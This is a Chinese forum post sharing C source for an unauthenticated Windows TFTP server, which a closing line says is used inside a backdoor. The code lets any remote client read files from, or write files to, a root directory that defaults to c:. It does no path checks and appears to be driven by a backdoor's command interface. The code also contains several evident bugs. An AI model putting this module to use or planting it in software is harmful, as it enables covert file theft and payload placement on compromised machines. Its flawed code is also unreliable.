文章作者:zvrop
复制内容到剪贴板
代码:
#define TIMEOUT_USECS 1000000
#define MAX_TIMEOUT 32000000
#include <windows.h>
#include <stdio.h>
typedef struct UCS
{
short UserSck;
}UCS;
void SrartTFTP(UCS *usck,char *Comline);
void StopTFTP();
UCS *sck;
int ExitOfTFTP=0;
SOCKET server;
int lisPort=69,canRed=1,canWri=1,redPort=10471,wriPort=11471;
char bootPath[MAX_PATH]="c:";
struct sendbuf
{
short pctcode;
short pakecode;
char buff[512];
};
struct readbuf
{
short pctcode;
char buff[512];
};
struct ackbuf
{
short pctcode;
short block;
};
struct canstk
{
SOCKET gsock;
struct sockaddr_in * readstk;
char * buff;
};
//---------------------------------------------------------------------
void error(SOCKET psock, struct sockaddr_in * sandstk,char *msg);
DWORD WINAPI getfile(LPVOID lpParam);
DWORD WINAPI putfile(LPVOID lpParam);
DWORD WINAPI createTFTP(LPVOID lpParam);
//------------------------
int WINAPI getcmdline(char *comm,char *cmdline,short cont)
{
short comdlast=1;
if((strncmp(comm+strlen(comm)-2,"\r\n",2))==0)
comdlast=2;
unsigned int i,geti=0,befi=0;
for(i=befi;i<(strlen(comm)-comdlast);i++)
{
if(comm[i]==' '&&geti<10)
{
strncpy(&cmdline[geti*cont],comm+befi,i-befi);
befi=i+1;
geti++;
}
}
if(geti<10)
{
strncpy(&cmdline[geti*cont],comm+befi,i-befi);
geti++;
}
return geti;
}
void rnvCasemsg(short a,char *msg)
{
printf(msg);
}
//------------------------------
DWORD WINAPI createTFTP(LPVOID lpParam)
{
WSADATA WSAData;
if(WSAStartup(MAKEWORD(2,2), &WSAData))
{
rnvCasemsg(sck->UserSck,"SOCKET DLL 设置出错!");
return 0;//设置socketdll
}
server=socket(AF_INET,SOCK_DGRAM,0);
if(server==SOCKET_ERROR)
{
rnvCasemsg(sck->UserSck,"SOCKET error!\r\n");
return 0;//设置socketdll
}
struct sockaddr_in sockAddr;
struct sockaddr_in client;
sockAddr.sin_family=AF_INET;//inter模式
sockAddr.sin_port=htons(lisPort);//监听端口
sockAddr.sin_addr.S_un.S_addr=INADDR_ANY;//接受所有地
if(bind(server, (LPSOCKADDR) & sockAddr, sizeof(sockAddr))==SOCKET_ERROR)
{
rnvCasemsg(sck->UserSck,"Bind error!\r\n");
return 0;//设置socketdll
}
int clicnttemp=sizeof(sockAddr);
fd_set fdread;
FD_ZERO(&fdread);
FD_SET(server,&fdread);
struct sendbuf sendbuff;
struct readbuf readbuff;
ExitOfTFTP=1;
while(1)
{
if(select(server+1,&fdread,NULL,NULL,NULL)==SOCKET_ERROR)
{
ExitOfTFTP=0;
return 0;//设置socketdll
}
else
{
ZeroMemory(&readbuff,sizeof(readbuff));
int rect=recvfrom(server,(BYTE*)&readbuff,sizeof(readbuff),0,(struct sockaddr *)&sockAddr,&clicnttemp);
if(rect<=0)
{
ExitOfTFTP=0;
break;//设置socketdll
}
struct canstk cank;
cank.gsock=server;
cank.readstk=&sockAddr;
cank.buff=readbuff.buff;
DWORD funid;
switch(ntohs(readbuff.pctcode))
{
case 1: CreateThread(NULL, 0, getfile, (LPVOID)&cank,0,&funid);
break;
case 2: CreateThread(NULL, 0, putfile, (LPVOID)&cank,0,&funid);
break;
case 3:
case 4:
case 5:error(server,&sockAddr,"不知道的错误!");
}
}
}
return 1;
}
//--------------------------------------------------------------------------
DWORD WINAPI getfile(LPVOID lpParam)
{
struct canstk *cansk=(struct canstk*)lpParam;
//char userIP[20]="";
//strcpy(userIP,inet_ntoa(cansk->readstk->sin_addr));
if(canRed!=true)
{
error(cansk->gsock,cansk->readstk,"Write only!");
return 0;
}
SOCKET sendserver;
sendserver=socket(AF_INET,SOCK_DGRAM,0);
if(sendserver==SOCKET_ERROR)
{
error(cansk->gsock,cansk->readstk,"SOCKET error!");
return 0;//设置socketdll
}
struct sockaddr_in sendAddr;
sendAddr.sin_family=AF_INET;//inter模式
sendAddr.sin_port=htons(redPort);//监听端口
sendAddr.sin_addr.S_un.S_addr=cansk->readstk->sin_addr.S_un.S_addr; //接受所有地
short portad=0;
while(bind(sendserver, (LPSOCKADDR) & sendAddr, sizeof(sendAddr))==SOCKET_ERROR)
{
sendAddr.sin_port=htons(redPort+portad);//监听端口
portad++;
}
char filename[MAX_PATH]="";
wsprintf(filename,"%s\\%s",bootPath,cansk->buff);
HANDLE rFile=CreateFile(filename,GENERIC_READ,0,0,
OPEN_EXISTING,0,0);
if(rFile!=INVALID_HANDLE_value)
{
unsigned long readnum=0,writenum=0,timeout=TIMEOUT_USECS;;
int packnum=1,from_len,nfds;
struct timeval tv;
fd_set fds;
struct sendbuf sendk;
ZeroMemory(&sendk,sizeof(sendk));
if(!ReadFile(rFile,sendk.buff,512,&readnum,NULL))
{
error(sendserver,cansk->readstk,"Read file fail!");
goto ext;
}
while(readnum)
{
sendk.pctcode=htons(3);
sendk.pakecode=htons(packnum++);
resend:writenum=sendto(sendserver,(BYTE*)&sendk,readnum+4,0,(struct sockaddr *)cansk->readstk,sizeof(sockaddr_in));
if(writenum!=(readnum+4))
{
error(sendserver,cansk->readstk,"Send data fail!");
break;
}
tv.tv_usec = timeout; tv.tv_sec = 0;
FD_ZERO (&fds);
FD_SET (sendserver,&fds);
again:nfds = select (sendserver + 1, &fds, NULL, NULL, &tv);
if (nfds < 0)
{
error(sendserver,cansk->readstk,"Recv file fail!");
break;
}
if (!nfds)
{
if (timeout >= MAX_TIMEOUT)
{
error(sendserver,cansk->readstk,"Recv ack timeout!");
break;
}
else
{
timeout <<= 1;
goto again;
}
}
from_len = sizeof(sendAddr);
struct ackbuf abuff;
ZeroMemory(&abuff,sizeof(abuff));
writenum = recvfrom(sendserver,(BYTE*)&abuff,sizeof(abuff),0,
(struct sockaddr *)&sendAddr, &from_len);
if (writenum<=0)
{
error(sendserver,cansk->readstk,"Recv ack fail!");
break;
}
switch(ntohs(abuff.pctcode))
{
case 1:
case 2:
case 3: error(sendserver,cansk->readstk,"Unknow error!");
goto ext;
case 4:
{
if((packnum-1)==ntohs(abuff.block))
{;}
else if((packnum-2)==ntohs(abuff.block))
{
packnum--;
goto resend;
}
else
{
error(sendserver,cansk->readstk,"Ack file fail?");
goto ext;
}
break;
}
case 5: error(sendserver,cansk->readstk,"Client error!");
goto ext;
}
ZeroMemory(sendk.buff,512);
if(!ReadFile(rFile,sendk.buff,512,&readnum,NULL))
{
error(sendserver,cansk->readstk,"Read file fail!");
goto ext;
}
if(readnum==0)
{
sendk.pctcode=htons(3);
sendk.pakecode=htons(packnum++);
sendto(sendserver,(BYTE*)&sendk,readnum+4,0,(struct sockaddr *)cansk->readstk,sizeof(cansk->readstk));
}
}
}
else
{
error(sendserver,cansk->readstk,"Can not find file~");
}
ext:CloseHandle(rFile);
closesocket(sendserver);
return 1;
}
DWORD WINAPI putfile(LPVOID lpParam)
{
struct canstk *cansk=(struct canstk*)lpParam;
//char userIP[20]="";
//strcpy(userIP,inet_ntoa(cansk->readstk->sin_addr));
if(canWri!=true)
{
error(cansk->gsock,cansk->readstk,"Read only!");
return 0;
}
SOCKET recvserver;
recvserver=socket(AF_INET,SOCK_DGRAM,0);
if(recvserver==SOCKET_ERROR)
{
error(cansk->gsock,cansk->readstk,"SOCKET error!");
return 0;
}
struct sockaddr_in sendAddr;
sendAddr.sin_family=AF_INET;//inter模式
sendAddr.sin_port=htons(wriPort);//监听端口
sendAddr.sin_addr.S_un.S_addr=cansk->readstk->sin_addr.S_un.S_addr; //接受所有地
int portad=0;
while(bind(recvserver, (LPSOCKADDR) & sendAddr, sizeof(sendAddr))==SOCKET_ERROR)
{
sendAddr.sin_port=htons(redPort+portad);//监听端口
portad++;
}
char filename[MAX_PATH]="";
wsprintf(filename,"%s\\%s",bootPath,cansk->buff);
HANDLE wFile=CreateFile(filename,GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(wFile!=INVALID_HANDLE_value)
{
unsigned long readnum=0,writenum=0,timeout=TIMEOUT_USECS;;
int packnum=0,from_len,nfds;
struct timeval tv;
fd_set fds;
struct ackbuf reack;
ZeroMemory(&reack,sizeof(reack));
reack.pctcode=htons(4);
reack.block=htons(packnum++);
writenum=sendto(recvserver,(BYTE*)&reack,4,0,(struct sockaddr *)cansk->readstk,sizeof(cansk->readstk));
if(writenum!=4)
{
error(recvserver,cansk->readstk,"Send file fail!");
goto ext;
}
while(1)
{
tv.tv_usec = timeout; tv.tv_sec = 0;
FD_ZERO (&fds);
FD_SET (recvserver,&fds);
again:nfds = select (recvserver + 1, &fds, NULL, NULL, &tv);
if (nfds < 0)
{
error(recvserver,cansk->readstk,"Recv data fail!");
break;
}
if (!nfds)
{
if (timeout >= MAX_TIMEOUT)
{
error(recvserver,cansk->readstk,"Recv ack timeout!");
break;
}
else
{
timeout <<= 1;
goto again;
}
}
from_len = sizeof(sendAddr);
struct sendbuf revbuff;
ZeroMemory(&revbuff,sizeof(revbuff));
readnum = recvfrom(recvserver,(BYTE*)&revbuff,sizeof(revbuff),0,
(struct sockaddr *)&sendAddr, &from_len);
if (readnum<= 0)
{
error(recvserver,cansk->readstk,"Recv ack fail!");
break;
}
else
{
switch(ntohs(revbuff.pctcode))
{
case 1:
case 2: error(recvserver,cansk->readstk,"Unknow error!");
goto ext;
case 3:
{
if((packnum)==ntohs(revbuff.pakecode))
{;}
else if((packnum-1)==ntohs(revbuff.pakecode))
{
packnum--;
goto resend;
}
else
{
error(recvserver,cansk->readstk,"Ack error!");
goto ext;
}
break;
}
case 4:
case 5: error(recvserver,cansk->readstk,"Client error!");
goto ext;
}
}
if(!WriteFile(wFile,revbuff.buff,readnum-4,&writenum,NULL))
if(writenum!=(readnum-4))
{
error(recvserver,cansk->readstk,"Write file error!");
goto ext;
}
reack.pctcode=htons(4);
reack.block=htons(packnum++);
resend:writenum=sendto(recvserver,(BYTE*)&reack,4,0,(struct sockaddr *)cansk->readstk,sizeof(cansk->readstk));
if(writenum!=4)
{
error(recvserver,cansk->readstk,"Send data fail!");
goto ext;
}
}
}
else
{
error(recvserver,cansk->readstk,"Can not find file~");
}
ext:CloseHandle(wFile);
closesocket(recvserver);
return 1;
}
//------------------------------------------------------------------------
void error(SOCKET psock, struct sockaddr_in * sandstk,char *msg)
{
struct sendbuf sendk;
sendk.pctcode=htons(5);
sendk.pakecode=htons(0);
strcpy(sendk.buff,msg);
sendto(psock,(BYTE*)&sendk,sizeof(sendk),0,(struct sockaddr *)sandstk,sizeof(sandstk));
}
//-------------------------------------------------------------------------
void SrartTFTP(UCS *usck,char *Comline)
{
sck=usck;
if(ExitOfTFTP==1)
{
rnvCasemsg(sck->UserSck,"TFTP's running!\r\n");
return;
}
lisPort=69;canRed=1;canWri=1;redPort=10471;wriPort=11471;
strcpy(bootPath,"c:");
char cmdline[10][512]={""};
getcmdline(Comline,&cmdline[0][0],512);
for(int i=0;i<10;i++)
{
if(cmdline[i]==NULL) continue;
if(cmdline[i][0]=='-')
{
cmdline[i][1]=toupper(cmdline[i][1]);
switch(cmdline[i][1])
{
case 'P':
{
lisPort=atoi(cmdline[i]+3);
if(lisPort<=0||lisPort>=65500)
{
rnvCasemsg(sck->UserSck,"LisPort error!");
return;
}
break;
}
case 'R':canRed=0;break;
case 'W':canWri=0;break;
case 'B':
{
memset(bootPath,0,MAX_PATH);
strncpy(bootPath,cmdline[i]+3,strlen(cmdline[i]+3));
break;
}
case 'I':
{
redPort=atoi(cmdline[i]+3);
if(redPort<=0||redPort>=65500)
{
rnvCasemsg(sck->UserSck,"ReadPort error!");
return;
}
break;
}
case 'O':
{
wriPort=atoi(cmdline[i]+3);
if(wriPort<=0||wriPort>=65500)
{
rnvCasemsg(sck->UserSck,"WriPort error!");
return;
}
break;
}
}
}
}
ExitOfTFTP=0;
DWORD dwThreadID;
if (CreateThread(NULL,0,&createTFTP,NULL,0,&dwThreadID)==NULL)
{
rnvCasemsg(sck->UserSck,"Thread error!\r\n");
return;
}
int timeout=0;
while(ExitOfTFTP==0)
{
Sleep(50);
rnvCasemsg(sck->UserSck,".");
if(timeout++>20)
{
rnvCasemsg(sck->UserSck,"Timeout!\r\n");
return;
}
}
rnvCasemsg(sck->UserSck,"Start TFTP successfully!\r\n");
}
void StopTFTP()
{
if(ExitOfTFTP==0)
{
rnvCasemsg(sck->UserSck,"TFTP no runing in it!\r\n");
return;
}
closesocket(server);
int timeout=0;
while(ExitOfTFTP==1)
{
Sleep(50);
rnvCasemsg(sck->UserSck,".");
if(timeout++>40)
{
rnvCasemsg(sck->UserSck,"Timeout!\r\n");
return;
}
}
rnvCasemsg(sck->UserSck,"Stop TFTP successfully!\r\n");
}//================================================
一个后门中用到的tftp服务器的源代码
